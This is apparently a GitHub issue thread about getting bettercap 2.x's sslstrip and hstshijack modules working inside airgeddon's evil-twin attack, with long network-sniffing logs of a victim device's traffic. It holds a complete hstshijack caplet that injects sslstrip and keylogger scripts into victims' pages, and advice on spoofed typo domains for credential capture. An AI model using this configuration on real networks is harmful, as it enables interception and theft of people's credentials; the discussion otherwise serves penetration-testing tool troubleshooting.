192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.https] sni 192.168.1.33 > https://es.m.wikipedia.org
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.https] sni 192.168.1.33 > https://www.instagram.com
192.168.1.0/24 > 192.168.1.1  » [06:20:51] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : trello.com is 23.37.161.11
192.168.1.0/24 > 192.168.1.1  » [06:20:51] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : safebrowsing.googleapis.com is 172.217.168.170
192.168.1.0/24 > 192.168.1.1  » [06:20:51] [net.sniff.https] sni 192.168.1.33 > https://safebrowsing.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [06:21:09] [net.sniff.https] sni 192.168.1.33 > https://www.instagram.com
192.168.1.0/24 > 192.168.1.1  » [06:21:12] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : scontent.xx.fbcdn.net is 31.13.83.4
192.168.1.0/24 > 192.168.1.1  » [06:21:12] [net.sniff.https] sni 192.168.1.33 > https://connect.facebook.net
192.168.1.0/24 > 192.168.1.1  » [06:21:13] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : scontent.xx.fbcdn.net is 31.13.83.4
192.168.1.0/24 > 192.168.1.1  » [06:21:14] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : star-mini.c10r.facebook.com is 31.13.83.36
192.168.1.0/24 > 192.168.1.1  » [06:21:14] [net.sniff.https] sni 192.168.1.33 > https://www.facebook.com
192.168.1.0/24 > 192.168.1.1  » [06:21:22] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : googleapis.l.google.com is 216.58.201.138, 172.217.17.10, 172.217.168.170, 172.217.16.234, 216.58.211.42, 216.58.201.170, 216.58.214.170
192.168.1.0/24 > 192.168.1.1  » [06:21:22] [net.sniff.https] sni 192.168.1.33 > https://www.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [06:22:00] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.google.com is 172.217.168.164
192.168.1.0/24 > 192.168.1.1  » [06:22:00] [net.sniff.https] sni 192.168.1.33 > https://www.google.com

Thank you so much for your time and infinite patience! but we really need help on this to put bettercap2.x on the road with airgeddon.

@buffermet
Copy link
Member

@OscarAkaElvis

This has been explained many times: you cannot sniff credentials on a HSTS preloaded domain.

This is the entire purpose of HSTS, to make sure than connections to those hosts are always done via SSL.

You tried to type trello.com and expected no HSTS to take place, and for bettercap to intercept a connection made without SSL. This is simply not how browsers work.

I think it should be "sslstrip enabled"

No, the http.proxy.sslstrip feature of bettercap proxy module is not the same as the sslstrip.js file that gets injected when you use hstshijack. The builtin sslstrip feature will sslstrip HTTP packets when they are proxied, whereas the javascript file sslstrip.js is injected into pages and is executed after the page has loaded.

Like I said, you will need to write custom payloads in order to downgrade search engines and other exploitable sites. You can also include all potential typos that the user might make when typing trello.com (such as trelo.com, trello.cmo, terllo.com) and have them redirect to the spoofed trello page.

I will upload my current Google payload, but expect that it will need to be updated as Google makes changes to its search engine.

The days where you can sniff passwords when people navigate directly to sites like trello.com are over.

@OscarAkaElvis
Copy link
Author

OscarAkaElvis commented Mar 14, 2019

That's not fully true. I really think you are wrong, man 😸 ... It is working on bettercap 1.x as you can see on my second post of this thread. That was performed days ago... still working... sslstrip is taking first http request (if user is typing trello.com or http://trello.com). I know that if user goes directly to https://trello.com there is nothing to do. And HSTS is just a header that once reached is going to say to the client "hey, this page is served by https, remember that for this amount of time!" and then the client is redirected and after that, same user trying to access again to the HSTS site will do it directly to the https site but there is still possible to do sslstrip even with HSTS if you are listening and sniffing on the first attempt of the user if he/she is requesting the http version of the site, remember that!!! that's the reason we clean all the cookies, tmp files and history from victim's browser on each test.

Another story is that browsers have internal lists with tons of known https sites like facebook, twitter, etc... and they are forcing that access to use https, I know that... for sure, to sniff that passwords sslstrip2 or sslstrip+ (is the same) is needed and dns spoof is needed... but for unknown https sites or any page not listed in browsers lists, sslstrip is still working .... and believe me, trello.com is not on that list!! as you can see in the screenshot of my second post, it is working even without spoofing any domain name.

What I am requesting here is... Is there any chance to have this working as bettercap 1.x is doing? Because in my opinion is much easier to handle. At least for our integration on which we don't know the pages where the victims are going to surf. Maybe bettercap 2.x is better for tailored attacks... but for sure, to be used in a "non scoped attack", bettercap 1.x is much better (talking about http and sslstrip stuff). That's the reason I think @evilsocket marked this as "to refactor". I think he plans to listen to us to create a behavior similar to bettercap 1.x

@buffermet
Copy link
Member

buffermet commented Mar 14, 2019

HSTS is just a header that once reached is going to say to the client "hey, this page is served by https, remember that for this amount of time!"

still possible to do sslstrip even with HSTS if you are listening and sniffing on the first attempt of the user if he/she is requesting the http version of the site

Not if preload is included in this header, which tells the browser that even if you clear your history/cache, the browser should still enforce SSL. Sites can even be protected from MITM attacks on factory reset browsers when they enroll into Chrome's HSTS preload program.

You're right about trello, they have a weak HSTS configuration. And when I type trello.com into the address bar, I get redirected to trello.corn (spoofed version), and I can sniff credentials without any issues...

Is there any chance to have this working as bettercap 1.x is doing?

It already is, if not better than in 1.x.

I don't see a single HTTP packet in your logs, just 1 DNS request for trello.com. Something's not right with your setup and it has nothing to do with bettercap.

Can you open up the network tool from your browser's developer tools, clear all the history, and then show us the list of requests that were made when you visit trello.com? If we can see that traffic it will tell us a lot more about what's going on.

so as soon as the attack is launched we'll close manually the opened bettercap window in order to launch our custom bettercap with desired config

Once the attack is launched, as we said before, close the bettercap's window and the DoS window if proceed and then open another terminal and launch bettercap

Why are you closing the bettercap window and opening another session?

@JBalanza
Copy link

I'm performing the tests you asked so we can see what is going on. First of all, just to let you know, when upgrading bettercap by go method, I got 2.17. For getting 2.19 I downloaded the compiled executable under the releases tab. But thats not the point of this post so I go down to work:

I run airgeddon as always, but when performing eviltwin+sslstrip+bettercap sniffing I close the original tab that runs the old bettercap and I run the new version myself while unstopping the attack.

1

The caplet I use is the following:

set hstshijack.log             /root/caplets/hstshijack/ssl.log
set hstshijack.payload         /root/caplets/hstshijack/payloads/hstshijack-payload.js
set hstshijack.ignore          *
set hstshijack.targets         *.com
set hstshijack.replacements    *.corn
set hstshijack.obfuscate       true
set hstshijack.encode          false

set hstshijack.custompayloads  *:/root/caplets/hstshijack/payloads/sslstrip.js,*:/root/caplets/hstshijack/payloads/keylogger.js

set http.proxy.script     /root/caplets/hstshijack/hstshijack.js
set http.proxy.port       8200
set net.sniff.filter      not (arp or port 5353)
set net.sniff.verbose     false

http.proxy  on
net.sniff   on

Now I connect with my laptop and this is the output log:

root@parrot  /opt/bettercap  ./bettercap -iface wlan0 -caplet caplet.cap 
bettercap v2.19 (built for linux amd64 with go1.10.4) [type 'help' for a list of commands]

[12:57:14] [sys.log] [war] Could not detect gateway.
[12:57:14] [sys.log] [inf] [hstshijack] Generating random variable names for this session ...
[12:57:14] [sys.log] [inf] [hstshijack] Reading SSL log ...
[12:57:14] [sys.log] [inf] [hstshijack] No SSL log file found, creating one now ...
[12:57:14] [sys.log] [inf] [hstshijack] Reading caplet ...

  Commands

    hstshijack.show : Show module info.

  Caplet

               hstshijack.log > /opt/bettercap/ssl.log
           hstshijack.payload > /usr/local/share/bettercap/caplets/hstshijack/payloads/hstshijack-payload.js
            hstshijack.ignore > *
           hstshijack.targets > *.com
      hstshijack.replacements > *.corn
      hstshijack.blockscripts > undefined
         hstshijack.obfuscate > true
            hstshijack.encode > false
    hstshijack.custompayloads > *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js
                              > *:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js

  Session info

         Session ID : MZKAptHaMKN
      Callback Path : /ZuRyvZNAZveuTibu
     Whitelist Path : /LYZJprLnPnJzEg
       SSL Log Path : /HcPDLABFJF
            SSL Log : 1 host

[12:57:14] [sys.log] [inf] [hstshijack] Module loaded.
[12:57:14] [sys.log] [inf] http.proxy started on 192.168.1.1:8200 (sslstrip disabled)
192.168.1.0/24 > 192.168.1.1  » [12:57:41] [endpoint.new] endpoint 192.168.1.37 detected as 48:a4:72:43:a7:e2 (Intel Corporate).
192.168.1.0/24 > 192.168.1.1  » [12:57:42] [net.sniff.dns] dns 80.58.61.254 > 192.168.1.37 : 4-c-0003.c-msedge.net is 13.107.4.52
192.168.1.0/24 > 192.168.1.1  » [12:57:42] [net.sniff.http.request] http 192.168.1.37 GET www.msftconnecttest.com/connecttest.txt
192.168.1.0/24 > 192.168.1.1  » [12:57:42] [net.sniff.http.response] http 13.107.4.52:80 200 OK -> 192.168.1.37 (22 B text/plain)

HTTP/1.1 200 OK
Access-Control-Expose-Headers: X-MSEdge-Ref
X-Cid: 7
Server: Microsoft-IIS/7.5
Etag: "0x8D343F9E96C9DAC"
X-Azure-Ref-Originshield: Ref A: 105E94C3796844D0888CE4B5F66FE969 Ref B: AMS04EDGE0419 Ref C: 2019-03-17T06:56:51Z
X-Ms-Version: 2009-09-19
X-Ccc: US
Date: Sun, 17 Mar 2019 11:57:43 GMT
Content-Type: text/plain
Content-Length: 22
Last-Modified: Fri, 04 Mar 2016 06:55:03 GMT
X-Ms-Meta-Cbmodifiedtime: Tue, 01 Mar 2016 21:41:22 GMT
Access-Control-Allow-Origin: *
X-Ecn-P: RD0003FF83728E
X-Ms-Blob-Type: BlockBlob
X-Msedge-Ref: Ref A: F9EF7E29D54E4C04AB03D57F5DD6CBE6 Ref B: MAD30EDGE0212 Ref C: 2019-03-17T11:57:43Z
X-Ms-Lease-Status: unlocked
X-Ms-Request-Id: 8c7a95ef-501e-0076-76a7-ce48d1000000
Timing-Allow-Origin: *

Microsoft Connect Test

192.168.1.0/24 > 192.168.1.1  » [12:57:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : client.dropbox-dns.com is 162.125.68.3
192.168.1.0/24 > 192.168.1.1  » [12:57:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : 4-c-0003.c-msedge.net is 13.107.4.52
192.168.1.0/24 > 192.168.1.1  » [12:57:46] [net.sniff.http.request] http 192.168.1.33 GET www.msftconnecttest.com/connecttest.txt
192.168.1.0/24 > 192.168.1.1  » [12:57:46] [net.sniff.http.response] http 13.107.4.52:80 200 OK -> 192.168.1.33 (22 B text/plain)

HTTP/1.1 200 OK
X-Ms-Meta-Cbmodifiedtime: Tue, 01 Mar 2016 21:41:22 GMT
Date: Sun, 17 Mar 2019 11:57:47 GMT
X-Ms-Lease-Status: unlocked
Last-Modified: Fri, 04 Mar 2016 06:55:03 GMT
X-Azure-Ref-Originshield: Ref A: 105E94C3796844D0888CE4B5F66FE969 Ref B: AMS04EDGE0419 Ref C: 2019-03-17T06:56:51Z
X-Cid: 7
Content-Length: 22
Server: Microsoft-IIS/7.5
X-Ccc: US
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Content-Type: text/plain
X-Ms-Version: 2009-09-19
X-Ms-Blob-Type: BlockBlob
Etag: "0x8D343F9E96C9DAC"
X-Ecn-P: RD0003FF83728E
Access-Control-Expose-Headers: X-MSEdge-Ref
X-Ms-Request-Id: 8c7a95ef-501e-0076-76a7-ce48d1000000
X-Msedge-Ref: Ref A: 31773596D9C2424997BEEB96B80DD012 Ref B: MAD30EDGE0116 Ref C: 2019-03-17T11:57:47Z

Microsoft Connect Test

192.168.1.0/24 > 192.168.1.1  » [12:57:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : bolt.v.dropbox.com is 162.125.18.133
192.168.1.0/24 > 192.168.1.1  » [12:57:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : db5p.wns.notify.windows.com.akadns.net is 40.67.255.199
192.168.1.0/24 > 192.168.1.1  » [12:57:46] [net.sniff.https] sni 192.168.1.33 > https://bolt.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [12:57:46] [net.sniff.https] sni 192.168.1.33 > https://client.wns.windows.com
192.168.1.0/24 > 192.168.1.1  » [12:57:47] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e12358.g.akamaiedge.net is 104.83.179.243
192.168.1.0/24 > 192.168.1.1  » [12:57:47] [net.sniff.https] sni 192.168.1.33 > https://kv601-prod.do.dsp.mp.microsoft.com
192.168.1.0/24 > 192.168.1.1  » [12:57:49] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : client.dropbox-dns.com is 162.125.65.3
192.168.1.0/24 > 192.168.1.1  » [12:57:49] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : connectivitycheck.gstatic.com is 74.125.138.94
192.168.1.0/24 > 192.168.1.1  » [12:57:49] [net.sniff.http.request] http 192.168.1.33 GET connectivitycheck.gstatic.com/generate_204
192.168.1.0/24 > 192.168.1.1  » [12:57:49] [net.sniff.http.response] http 74.125.138.94:80 204 No Content -> 192.168.1.33 (0 B ?)
192.168.1.0/24 > 192.168.1.1  » [12:57:49] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : a1961.g2.akamai.net is 2.22.126.19, 2.22.126.64
192.168.1.0/24 > 192.168.1.1  » [12:57:49] [net.sniff.http.request] http 192.168.1.33 GET www.msftncsi.com/ncsi.txt
192.168.1.0/24 > 192.168.1.1  » [12:57:50] [net.sniff.https] sni 192.168.1.33 > https://bolt.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.http.response] http 2.22.126.19:80 200 OK -> 192.168.1.33 (14 B text/plain)

HTTP/1.1 200 OK
Date: Sun, 17 Mar 2019 11:57:56 GMT
Connection: keep-alive
Content-Type: text/plain
Content-Length: 14
Cache-Control: max-age=30, must-revalidate

Microsoft NCSI

192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.http.request] http 192.168.1.33 GET connectivitycheck.gstatic.com/generate_204
192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.http.response] http 74.125.138.94:80 204 No Content -> 192.168.1.33 (0 B ?)
192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.http.request] http 192.168.1.33 GET www.msftncsi.com/ncsi.txt
192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.http.response] http 2.22.126.19:80 200 OK -> 192.168.1.33 (14 B text/plain)

HTTP/1.1 200 OK
Cache-Control: max-age=30, must-revalidate
Date: Sun, 17 Mar 2019 11:57:57 GMT
Connection: keep-alive
Content-Type: text/plain
Content-Length: 14

Microsoft NCSI

192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 64.233.177.138, 64.233.177.101, 64.233.177.100, 64.233.177.102, 64.233.177.139, 64.233.177.113
192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.http.request] http 192.168.1.33 GET clients3.google.com/
192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.http.response] http 64.233.177.138:80 200 OK -> 192.168.1.33 (92 B text/html)
192.168.1.0/24 > 192.168.1.1  » [12:57:55] [net.sniff.https] sni 192.168.1.33 > https://clients3.google.com
192.168.1.0/24 > 192.168.1.1  » [12:57:56] [net.sniff.http.request] http 192.168.1.33 GET connectivitycheck.gstatic.com/generate_204
192.168.1.0/24 > 192.168.1.1  » [12:57:56] [net.sniff.http.response] http 74.125.138.94:80 204 No Content -> 192.168.1.33 (0 B ?)
192.168.1.0/24 > 192.168.1.1  » [12:57:56] [net.sniff.http.request] http 192.168.1.33 GET www.msftncsi.com/ncsi.txt
192.168.1.0/24 > 192.168.1.1  » [12:57:56] [net.sniff.http.response] http 2.22.126.19:80 200 OK -> 192.168.1.33 (14 B text/plain)

HTTP/1.1 200 OK
Date: Sun, 17 Mar 2019 11:57:58 GMT
Connection: keep-alive
Content-Type: text/plain
Content-Length: 14
Cache-Control: max-age=30, must-revalidate

Microsoft NCSI

192.168.1.0/24 > 192.168.1.1  » [12:57:56] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e4117.g.akamaiedge.net is 104.83.212.185
192.168.1.0/24 > 192.168.1.1  » [12:57:56] [net.sniff.https] sni 192.168.1.33 > https://us.norton.com
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.request] http 192.168.1.33 GET connectivitycheck.gstatic.com/generate_204
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.response] http 74.125.138.94:80 204 No Content -> 192.168.1.33 (0 B ?)
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.request] http 192.168.1.33 GET www.msftncsi.com/ncsi.txt
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.response] http 2.22.126.19:80 200 OK -> 192.168.1.33 (14 B text/plain)

HTTP/1.1 200 OK
Cache-Control: max-age=30, must-revalidate
Date: Sun, 17 Mar 2019 11:57:58 GMT
Connection: keep-alive
Content-Type: text/plain
Content-Length: 14

Microsoft NCSI

192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.request] http 192.168.1.33 GET us.norton.com/
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.response] http 104.83.212.185:80 301 Moved Permanently -> 192.168.1.33 (0 B ?)
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : mue1-shasta-mrs-prod01.eastus.cloudapp.azure.com is 23.96.80.215
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.https] sni 192.168.1.33 > https://shasta-mrs.symantec.com
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.request] http 192.168.1.33 GET connectivitycheck.gstatic.com/generate_204
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.response] http 74.125.138.94:80 204 No Content -> 192.168.1.33 (0 B ?)
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.request] http 192.168.1.33 GET www.msftncsi.com/ncsi.txt
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.http.response] http 2.22.126.19:80 200 OK -> 192.168.1.33 (14 B text/plain)

HTTP/1.1 200 OK
Date: Sun, 17 Mar 2019 11:57:59 GMT
Connection: keep-alive
Content-Type: text/plain
Content-Length: 14
Cache-Control: max-age=30, must-revalidate

Microsoft NCSI

192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : star-mini.c10r.facebook.com is 157.240.1.35
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : cloudflare-dns.com is 104.16.111.25, 104.16.112.25
192.168.1.0/24 > 192.168.1.1  » [12:57:57] [net.sniff.https] sni 192.168.1.33 > https://cloudflare-dns.com
192.168.1.0/24 > 192.168.1.1  » [12:57:58] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googlemail.l.google.com is 216.58.214.165
192.168.1.0/24 > 192.168.1.1  » [12:57:58] [net.sniff.https] sni 192.168.1.33 > https://cloudflare-dns.com
192.168.1.0/24 > 192.168.1.1  » [12:58:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : mue1-shasta-rrs-prod01.eastus.cloudapp.azure.com is 104.211.8.250
192.168.1.0/24 > 192.168.1.1  » [12:58:05] [net.sniff.https] sni 192.168.1.33 > https://shasta-rrs.symantec.com
192.168.1.0/24 > 192.168.1.1  » [12:58:06] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : d-sjc.v.dropbox.com is 162.125.34.137
192.168.1.0/24 > 192.168.1.1  » [12:58:06] [net.sniff.https] sni 192.168.1.33 > https://d.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [12:58:11] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : b-0005.b-msedge.net is 13.107.6.158
192.168.1.0/24 > 192.168.1.1  » [12:58:11] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : dual-a-0001.a-msedge.net is 204.79.197.200, 13.107.21.200
192.168.1.0/24 > 192.168.1.1  » [12:58:11] [net.sniff.https] sni 192.168.1.33 > https://www.bing.com
192.168.1.0/24 > 192.168.1.1  » [12:58:11] [net.sniff.https] sni 192.168.1.33 > https://www.bing.com
192.168.1.0/24 > 192.168.1.1  » [12:58:11] [net.sniff.https] sni 192.168.1.33 > https://api.cortana.ai
192.168.1.0/24 > 192.168.1.1  » [12:58:13] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : a-0019.a-msedge.net is 204.79.197.222
192.168.1.0/24 > 192.168.1.1  » [12:58:13] [net.sniff.https] sni 192.168.1.33 > https://fp.msedge.net
192.168.1.0/24 > 192.168.1.1  » [12:58:13] [net.sniff.https] sni 192.168.1.33 > https://www.bing.com
192.168.1.0/24 > 192.168.1.1  » [12:58:14] [net.sniff.https] sni 192.168.1.33 > https://www.bing.com
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clientservices.googleapis.com is 64.233.177.94
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googleapis.l.google.com is 172.217.12.106, 74.125.138.95, 64.233.177.95, 64.233.176.95
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.google.com is 172.217.3.228
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : android.l.google.com is 172.217.17.14, 172.217.168.174, 172.217.16.238, 216.58.211.46, 216.58.201.174
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 216.58.211.46
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : mobile-gtalk.l.google.com is 64.233.167.188
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : accounts.google.com is 216.58.201.173
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.https] sni 192.168.1.33 > https://clients2.google.com
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.https] sni 192.168.1.33 > https://mtalk.google.com:5228
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.https] sni 192.168.1.33 > https://android.clients.google.com
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : spoc-muw1.norton.com is 13.91.60.30
192.168.1.0/24 > 192.168.1.1  » [12:58:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e12564.dspb.akamaiedge.net is 2.21.182.195
192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.https] sni 192.168.1.33 > https://accounts.google.com
192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.https] sni 192.168.1.33 > https://clientservices.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.https] sni 192.168.1.33 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.https] sni 192.168.1.33 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.https] sni 192.168.1.33 > https://www.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.https] sni 192.168.1.33 > https://store-images.s-microsoft.com
[12:58:16] [net.sniff.https] sni 192.168.1.33 > https://store-images.s-microsoft.com
192.168.1.0/24 > 192.168.1.1  » 192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.https] sni 192.168.1.33 > https://spoc.norton.com
192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 74.125.138.101, 74.125.138.102, 74.125.138.100, 74.125.138.138, 74.125.138.113, 74.125.138.139
192.168.1.0/24 > 192.168.1.1  » [12:58:16] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googlehosted.l.googleusercontent.com is 172.217.0.129
192.168.1.0/24 > 192.168.1.1  » [12:58:17] [net.sniff.https] sni 192.168.1.33 > https://clients4.google.com
192.168.1.0/24 > 192.168.1.1  » [12:58:17] [net.sniff.https] sni 192.168.1.33 > https://lh4.googleusercontent.com
192.168.1.0/24 > 192.168.1.1  » [12:58:17] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googlehosted.l.googleusercontent.com is 172.217.10.193
192.168.1.0/24 > 192.168.1.1  » [12:58:17] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 216.58.211.46
192.168.1.0/24 > 192.168.1.1  » [12:58:17] [net.sniff.https] sni 192.168.1.33 > https://clients5.google.com
192.168.1.0/24 > 192.168.1.1  » [12:58:18] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : pagead46.l.doubleclick.net is 172.217.168.162
192.168.1.0/24 > 192.168.1.1  » [12:58:19] [net.sniff.https] sni 192.168.1.33 > https://googleads.g.doubleclick.net
192.168.1.0/24 > 192.168.1.1  » [12:58:24] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : ssl.gstatic.com is 216.58.211.35
192.168.1.0/24 > 192.168.1.1  » [12:58:24] [net.sniff.https] sni 192.168.1.33 > https://ssl.gstatic.com
192.168.1.0/24 > 192.168.1.1  » [12:58:24] [net.sniff.https] sni 192.168.1.33 > https://ssl.gstatic.com
192.168.1.0/24 > 192.168.1.1  » [12:58:25] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : trello.com is 23.223.98.162
192.168.1.0/24 > 192.168.1.1  » [12:58:25] [net.sniff.http.request] http 192.168.1.33 GET trello.com/
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.response] http 23.223.98.162:80 301 Moved Permanently -> 192.168.1.33 (0 B ?)
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.request] http 192.168.1.33 GET trello.com/
[12:58:32] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googleadapis.l.google.com is 172.217.16.234
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.request] http 192.168.1.33 GET fonts.googleapis.com/css?family=Roboto
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : d2k1ftgv7pobq7.cloudfront.net is 54.240.186.113, 54.240.186.13, 54.240.186.178, 54.240.186.77
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.response] http 172.217.16.234:80 200 OK -> 192.168.1.33 (841 B text/css; charset=utf-8)
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/08e7d2cd3b12804c1b7214d828bab7e6/cookiec.min.js
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/4d6a8d86111c3f545bdeab85bae0cc8e/snowplow.js
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/trello-header-logos/1c3a2d636e34d62a6cb27d83e5e6956b/trell...
192.168.1.0/24 > 192.168.1.1  » [12:58:32] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/c13d1cd96a2cff30f0460a5e1860c5ea/header-logo-blue.svg
192.168.1.0/24 > 192.168.1.1  » [12:58:37] [net.sniff.https] sni 192.168.1.33 > https://client.wns.windows.com
192.168.1.0/24 > 192.168.1.1  » [12:58:58] [net.sniff.http.request] http 192.168.1.33 GET trello.com/
192.168.1.0/24 > 192.168.1.1  » [12:58:58] [net.sniff.http.response] http 23.223.98.162:80 302 Moved -> 192.168.1.33 (0 B ?)

HTTP/1.1 302 Moved
Set-Cookie: mab=EXPIRED;Path=/;Domain=trello.com;Expires=Mon, 01-Jan-1990 00:00:00 GMT

192.168.1.0/24 > 192.168.1.1  » [12:58:58] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : chrome-devtools-frontend.appspot.com is 172.217.168.180
192.168.1.0/24 > 192.168.1.1  » [12:58:58] [net.sniff.https] sni 192.168.1.33 > https://chrome-devtools-frontend.appspot.com
192.168.1.0/24 > 192.168.1.1  » [12:58:58] [net.sniff.http.request] http 192.168.1.33 GET trello.com/
192.168.1.0/24 > 192.168.1.1  » [12:58:59] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/08e7d2cd3b12804c1b7214d828bab7e6/cookiec.min.js
192.168.1.0/24 > 192.168.1.1  » [12:58:59] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
192.168.1.0/24 > 192.168.1.1  » [12:58:59] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
